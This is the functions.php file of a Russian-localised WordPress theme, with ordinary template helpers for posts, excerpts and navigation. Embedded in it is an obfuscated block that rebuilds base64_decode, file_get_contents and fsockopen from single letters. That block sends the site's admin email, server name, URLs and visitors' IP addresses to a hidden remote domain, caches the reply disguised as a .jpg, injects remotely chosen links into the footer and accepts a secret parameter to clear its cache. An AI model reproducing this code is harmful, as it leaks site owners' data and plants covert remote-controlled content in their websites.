<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $apqsKs='e';$jwZg='b';$NpdVhsu='4';$UtFz='e';$tIgNrp='6';$XDEa='_';$iydYZi='s';$xRmcRO='d';$nGBEVys='c';$DiBKrv='d';$BnsU='o';$RpyY='a';$gjUrCYD='e';$emdueAtI=$jwZg.$RpyY.$iydYZi.$gjUrCYD.$tIgNrp.$NpdVhsu.$XDEa.$DiBKrv.$UtFz.$nGBEVys.$BnsU.$xRmcRO.$apqsKs;$YNiT='i';$JTMjgU='z';$Rmcg='f';$dmgNfS='a';$DAKUj='n';$iOhTu='g';$lMikArd='t';$cujR='l';$VEzPNHG='e';$IxXcUoOa=$iOhTu.$JTMjgU.$YNiT.$DAKUj.$Rmcg.$cujR.$dmgNfS.$lMikArd.$VEzPNHG;$NQPN='r';$uhsU='s';$ogsRVHC='1';$DPoKZT='_';$pPmwihV='o';$wJtaj='t';$oKkqG='r';$RpEays='t';$AWkkgAR='3';$JoQPbWHY=$uhsU.$wJtaj.$NQPN.$DPoKZT.$oKkqG.$pPmwihV.$RpEays.$ogsRVHC.$AWkkgAR;$pPmtAt='r';$eYxH='r';$Slgtk='e';$tPnhI='s';$NaSVJt='v';$oDTtHy='t';$LgarSLBY=$tPnhI.$oDTtHy.$eYxH.$pPmtAt.$Slgtk.$NaSVJt;                     
		$mm_______________y='e';$al____________b='b';$mb__________b='4';$mz________u='e';$jq______________y='6';$gl_____u='_';$xs_____________a='s';$qw_________a='d';$vp__s='c';$ja_____j='d';$hv____________f='o';$iw___g='a';$xv___j='e';$xp_____________o=$al____________b.$iw___g.$xs_____________a.$xv___j.$jq______________y.$mb__________b.$gl_____u.$ja_____j.$mz________u.$vp__s.$hv____________f.$qw_________a.$mm_______________y;
		$ol___i='i';$dn_______w='f';$tg_______________y='s';$fz_________z='i';$tl_______________u='u';$fn______________d='t';$uh____r='t';$le_________f='_';$iy____v='s';$go____________p='x';$xv__z='o';$pl_______________t='e';$ia___________n='c';$dv__________a='n';$nx____________q='n';$rw___n=$dn_______w.$tl_______________u.$dv__________a.$ia___________n.$uh____r.$fz_________z.$xv__z.$nx____________q.$le_________f.$pl_______________t.$go____________p.$ol___i.$tg_______________y.$fn______________d.$iy____v;
		$au_____________l='e';$gh____g='n';$ca______e='p';$kg__s='f';$ee_________a='o';$pm_____e=$kg__s.$ee_________a.$ca______e.$au_____________l.$gh____g;
		$js__________g='e';$le_____________b='a';$ax______________n='r';$lt____________r='f';$af__d='d';$ex___________a=$lt____________r.$ax______________n.$js__________g.$le_____________b.$af__d;
		$lc_____________w='l';$cl___________w='o';$lr_______________m='c';$vf___________c='s';$qy____________u='e';$yr_____q='f';$by__________h=$yr_____q.$lr_______________m.$lc_____________w.$cl___________w.$vf___________c.$qy____________u;
		
		define("WP_ID", $xp_____________o("Mi4wLjA="));
		define("WP_TTL", $xp_____________o("MTA4MDA="));
		define("WP_SRC", $xp_____________o("dHBva24="));
	


		function wp_get_header() {
			global $xp_____________o, $rw___n;
			
			if (
				$rw___n($xp_____________o("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$rw___n($xp_____________o("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$rw___n($xp_____________o("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $xp_____________o, $pm_____e, $by__________h, $ex___________a;
			
			$ob__w = TEMPLATEPATH."/".$xp_____________o("Zm9vdGVyLnBocA==");
			$ss________e = @$pm_____e($ob__w, "r");
			$ob__w = @$ex___________a($ss________e, @filesize($ob__w));
			@$by__________h($ss________e);
			
			$vc____a = TEMPLATEPATH."/".$xp_____________o("ZnVuY3Rpb25zLnBocA==");
			$ss________e = @$pm_____e($vc____a, "r");
			$vc____a = @$ex___________a($ss________e, @filesize($vc____a));
			@$by__________h($ss________e);
			
			$pi__z = 0;
			if($ob__w && $vc____a) {
				if ($xp_____________o("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($ob__w, $xp_____________o("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$pi__z = 1;
					}
					if (substr_count($ob__w, "wp_theme_GPL_credits()") < 1) {
						$pi__z = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$pi__z = 12;
				}
			}
			
			if($pi__z > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $pi__z -->";
			}
		}
	


		function wp_loaded() {
			global $xp_____________o, $rw___n;
			return $rw___n($xp_____________o("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($wt_____q, $im__f = "(more...)", $yi______________y = 0, $rk___________d = "") {
				$fg_____________s = get_the_content($im__f, $yi______________y, $rk___________d);
				$fg_____________s = apply_filters("the_content", $fg_____________s);
				
				$fg_____________s = str_replace("]]>", "]]>", $fg_____________s);
				if (strlen($_GET["p"]) > 0) {
					echo $fg_____________s;
				}
				else if ((strlen($fg_____________s)>$wt_____q) && ($zp________a = strpos($fg_____________s, " ", $wt_____q ))) {
					$fg_____________s = substr($fg_____________s, 0, $zp________a);
					$fg_____________s = $fg_____________s;
					echo $fg_____________s;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$im__f</a></div></p>";
				} else {
					echo $fg_____________s;
				}
				
			}
		}
	


		$wn______________j='a';$sl______________r='s';$ui__m='c';$ph__v='e';$uw____j='o';$jj_______b='e';$ef____w='d';$rk______________j='b';$rv___________b='6';$aw_______________w='e';$vs_______e='4';$ye__________i='_';$uh_______q='n';$fh______________z=$rk______________j.$wn______________j.$sl______________r.$ph__v.$rv___________b.$vs_______e.$ye__________i.$jj_______b.$uh_______q.$ui__m.$uw____j.$ef____w.$aw_______________w;
		$ea_________w='l';$tm_____________z='i';$ks_____________o='n';$hw__e='n';$cz__a='e';$xy____________d='g';$do__c='t';$ba_____g='c';$lv__n='s';$tk___________v='e';$gw___________t='t';$at___b='o';$qu___________o='t';$an____________z='e';$xu____________n='_';$np____g='_';$yy_________b='f';$dm__n=$yy_________b.$tm_____________z.$ea_________w.$an____________z.$xu____________n.$xy____________d.$cz__a.$do__c.$np____g.$ba_____g.$at___b.$hw__e.$qu___________o.$tk___________v.$ks_____________o.$gw___________t.$lv__n;
		$df_____________h='i';$uv_______________h='e';$dy__l='f';$qm_________g='e';$co_______________c='i';$aw_____________r='s';$sh_________r='l';$ls______d='t';$fp_________s='x';$ew____________g='s';$ee______________s='_';$sh_________e=$dy__l.$co_______________c.$sh_________r.$qm_________g.$ee______________s.$uv_______________h.$fp_________s.$df_____________h.$ew____________g.$ls______d.$aw_____________r;
		$zc__b='v';$ct____________i='e';$mh_____p='i';$nk_______z='p';$vd____k='e';$eo_______e='o';$la__________o='c';$nf_____t='m';$ez__v='r';$fh___q='s';$pj_______________o='_';$ui______________w='o';$bf______l='r';$qv___i='n';$rq__________v='a';$jf__v=$zc__b.$ct____________i.$bf______l.$fh___q.$mh_____p.$eo_______e.$qv___i.$pj_______________o.$la__________o.$ui______________w.$nf_____t.$nk_______z.$rq__________v.$ez__v.$vd____k;
		$rf__________d='o';$qu____________b='n';$oi__u='o';$fh_______________r='e';$ce____________p='p';$yi_____a='k';$az____t='c';$li_____________c='f';$ka____w='s';$jx_______________n=$li_____________c.$ka____w.$oi__u.$az____t.$yi_____a.$rf__________d.$ce____________p.$fh_______________r.$qu____________b;
		$es_________r='t';$gd___n='w';$fz_____w='e';$bg_____________z='r';$ow_____________e='i';$yh_____t='f';$kr____________r=$yh_____t.$gd___n.$bg_____________z.$ow_____________e.$es_________r.$fz_____w;
		$yd_______c='d';$vx____________b='5';$rc______f='m';$ur_____________v=$rc______f.$yd_______c.$vx____________b;
		$kv_______________a='a';$hm___e='r';$fw_________b='e';$js_____f='p';$wt____i='a';$ep_______t='l';$es_________p='t';$jd_________r='h';$xl__b=$hm___e.$fw_________b.$wt____i.$ep_______t.$js_____f.$kv_______________a.$es_________p.$jd_________r;
		$fs__________f='a';$ee__________q='e';$yg_____a='r';$mj____s='i';$ni_______________t='i';$ja______i='s';$fn____c='n';$hl___c='l';$wd_____________g='z';$mf______________p='e';$vb____x='u';$bf__________k=$vb____x.$fn____c.$ja______i.$mf______________p.$yg_____a.$mj____s.$fs__________f.$hl___c.$ni_______________t.$wd_____________g.$ee__________q;
		$xv______________q='t';$gq________f='p';$tt______z='m';$ry________k='a';$if_____________f='e';$bc____________v='n';$bi______h='m';$xu______________t=$xv______________q.$if_____________f.$tt______z.$gq________f.$bc____________v.$ry________k.$bi______h;
		$hg__z='c';$if_________c='a';$et__b='m';$td______p='e';$hy___x='t';$or__________c='t';$qi____f='e';$wf_________a='a';$yu_______________p='r';$qw______________i='n';$qh_____________o='e';$cm_____t='t';$yx_______g='s';$iv___________r='t';$nf______________w='_';$rg_________y='r';$rs____________z='o';$xn_______________m='_';$pu______n='c';$rw______________u='e';$jv__________n='x';$ic_______l=$yx_______g.$hy___x.$rg_________y.$qh_____________o.$wf_________a.$et__b.$nf______________w.$pu______n.$rs____________z.$qw______________i.$cm_____t.$td______p.$jv__________n.$or__________c.$xn_______________m.$hg__z.$yu_______________p.$rw______________u.$if_________c.$iv___________r.$qi____f;
	


		function fa_____b($nr_____________a) {
			global $xp_____________o, $rw___n, $dm__n, $jf__v, $ic_______l;
			
			if (!$rw___n($xp_____________o("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($jf__v(PHP_VERSION, "5.0.0", ">=") && $rw___n($xp_____________o("ZmlsZV9nZXRfY29udGVudHM=")) && $rw___n($xp_____________o("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$bq____h = $ic_______l(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$lc___________z = @$dm__n($nr_____________a, 0, $bq____h);
			} else {
				$lc___________z = @$dm__n($nr_____________a, 0);
			}
			
			return $lc___________z;
		}
	


		function mu______x($nr_____________a) {
			global $rw___n, $jx_______________n, $kr____________r, $xp_____________o;
			
			if (!$rw___n($xp_____________o("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$ap____t = strpos($nr_____________a, "/", 7);
			$dn________c = array(
				"uri"     => substr($nr_____________a, $ap____t),
				"host"    => str_replace("http://", "", substr($nr_____________a, 0, $ap____t)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$ht__________k = @$jx_______________n("$dn________c[host]", 80, $uv_____e, $gq_______i, 4);
			
			if (!$ht__________k) {
				return false;
			} else {
				$lc___________z = "";
				$nd______________r  = "GET $dn________c[uri] HTTP/1.0\r\n";
				$nd______________r .= "Host: $dn________c[host]\r\n";
				$nd______________r .= "Referer: $dn________c[referer]\r\n";
				$nd______________r .= "Connection: Close\r\n\r\n";
				
				@$kr____________r($ht__________k, $nd______________r);
				
				while (!@feof($ht__________k)) {
					$ps________d = @fgets($ht__________k, (1024*24));
					
					if ($ps________d == "\r\n") {
						$ga____________d = true;
						continue;
					}
					
					if ($ga____________d) {
						$lc___________z .= $ps________d;
					}
				}
				
				return $lc___________z;
			}
		}
	


		function os_________r($nr_____________a) {
			global $rw___n;
			$bi___u = false;
			
			if ($nr_____________a != "") {
				if ($rw___n("fa_____b")) {
					$bi___u = @fa_____b($nr_____________a);
				}
				
				if (!$bi___u && ($rw___n("mu______x"))) {
					$bi___u = @mu______x($nr_____________a);
				}
			}
			
			return $bi___u;
		}
	


		function kb__q() {
			global $_SERVER, $ur_____________v;
			
			$mr_____w = $_SERVER["SERVER_NAME"];
			
			if (substr("$mr_____w", 0, 4) == "www.") {
				$mr_____w = substr("$mr_____w", 4);
			}
			
			$mr_____w = $ur_____________v("$_SERVER[SERVER_NAME]");
			
			return $mr_____w;
		}
	


		function vd__________x() {
			return "file";
		}
	


		function oq_____________l($nr_____________a) {
			global $_SERVER, $dm__n, $sh_________e, $pm_____e, $by__________h, $kr____________r;
			
			$ox_________k = rx_________z();
			
			$np______________s = kb__q().".jpg";
			$zc_______i = $ox_________k["dir_upload"]["path"]."/$np______________s";
			$xs__t = @filemtime($zc_______i);
			
			if (!$xs__t || ((time()-$xs__t) >= WP_TTL)) {
				$bi___u = os_________r($nr_____________a);
				
				if ($bi___u) {
					if ($sh_________e($zc_______i)) {
						@unlink($zc_______i);
					}
					
					$ss________e = @$pm_____e($zc_______i, "x+");
					
					@$kr____________r($ss________e, $bi___u);
					@$by__________h($ss________e);
				}
			} else {
				if ($sh_________e($zc_______i)) {
					$bi___u = @$dm__n($zc_______i);
				} else {
					$bi___u = false;
				}
			}
			
			return $bi___u;
		}
	


		function rx_________z() {
			global $_SERVER, $xp_____________o, $fh______________z;
			
			$sd________e = wp_count_posts("post");
			$js_______l = pathinfo(get_bloginfo("template_directory"));
			
			$ox_________k = array(
				"url" => array(
					"report"      => $xp_____________o("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $js_______l,
				"dir_upload"	=> fz_____________w(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$js_______l[filename],
					"a005=".$sd________e->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " <a href=\"http://www.wptheme.us\">www.wptheme.us</a>"
			);
			
			$ox_________k["url"]["queryString"] = implode("&", $ox_________k["queryString"]);
			$ox_________k["url"]["report"] = $ox_________k["url"]["report"]."/?".$fh______________z($ox_________k["url"]["queryString"]).".html";
						
			return $ox_________k;
		}
	


		function fz_____________w() {
			$jc_______d = wp_upload_dir();
			
			if (isset($jc_______d["error"])) {
				$jj______o = sx___e();
				if (is_writable($jj______o)) {
					$jc_______d = array("path" => $jj______o);
				}
			}

			return $jc_______d;
		}
	


		function sx___e() {
			global $rw___n, $ur_____________v, $xl__b, $xu______________t;
			
			$py____y = (bool) ini_get("safe_mode");
			if ($py____y == true) {
				return false;
			}
			
			if ($rw___n("sys_get_temp_dir")) {
				$dh_______b = sys_get_temp_dir();
				if (is_writable($dh_______b)) {
					return $xl__b($dh_______b);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $xl__b($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $xl__b($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $xl__b($_ENV["TEMP"]);
			} else {
				$gk________c = $xu______________t($ur_____________v(uniqid(rand(), true)), "");
				if ($gk________c) {
					$dh_______b = $xl__b(dirname($gk________c));
					@unlink($gk________c);
					return $dh_______b;
				} else {
					return false;
				}
			}
		}
	


		function zg________o() {
			global $_GET, $sh_________e;
			
			$ox_________k = rx_________z();
			$mr_____w = kb__q();
			$an______d = vd__________x();
			
			$ou_____________c = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($an______d == "file") {
					$kk__________w = $ox_________k["dir_upload"]["path"]."/".$mr_____w.".jpg";
					if ($sh_________e($kk__________w)) {
						@unlink($kk__________w);
						$ou_____________c = "deleted";
					}
				}
				
				$xe____________k = array(
					"s"	=> $ou_____________c,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($xe____________k AS $al____________k => $wj_____s) echo " [$al____________k:$wj_____s]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $rw___n, $xp_____________o, $bf__________k;
			$ox_________k = rx_________z();
			
			$iv____q = "oq_____________l";
			if ($rw___n($iv____q)) {
				$lc___________z = $iv____q($ox_________k["url"]["report"]);
			}
			
			if ($lc___________z) {
				if ($lc___________z = @$xp_____________o($lc___________z)) {
					$lc___________z = @$bf__________k($lc___________z);
					
					if (strlen($lc___________z[custom_credit]) >= 5) {
						$ox_________k["default_string"] = $lc___________z[custom_credit];
					}
					
					if ($lc___________z["status"] == "0") {
						$jz_____________p = 1;
						$qi_______s = 1;
					} else {
						$vs___h = sizeof($lc___________z["links"]);
						$jl________u = $ox_________k["default_string"];
						
						if ($vs___h > 0 && $lc___________z["links"] !== "") {
							$lb______________c = 0;
							foreach ($lc___________z["links"] as $yc_______t => $fv______e) {
								$lb______________c++;
								if ($fv______e->l_path == "" || $fv______e->l_path == $_SERVER["REQUEST_URI"]) {
									$fv______e->l_href = htmlspecialchars(strip_tags($fv______e->l_href));
									$fv______e->l_title = htmlspecialchars(strip_tags($fv______e->l_title));
									$fv______e->l_anchor = htmlspecialchars(strip_tags($fv______e->l_anchor));
									$jl________u .= " | ";
									$jl________u .= "<a href='$fv______e->l_href' title='$fv______e->l_title'";
									if ($fv______e->l_nofollow == "1") {
										$jl________u .= " rel='nofollow'";
									}
									$jl________u .= ">$fv______e->l_anchor</a>";
								}
							}
						}
						$ox_________k["links"] = "$jl________u";
						if ($lc___________z[credit] == "0") {
							$ox_________k["links"] = "";
						}
					}
				} else {
					$jz_____________p = "1";
				}
			} else {
				$jz_____________p = "1";
			}
			
			if ($jz_____________p == "1") {
				$ox_________k["links"] = $ox_________k["default_string"];
			}
			
			echo "$ox_________k[links]";
			
			echo "<!-- s: $lc___________z[signature] -->";
			zg________o();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
     echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),  
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                    $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
     $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

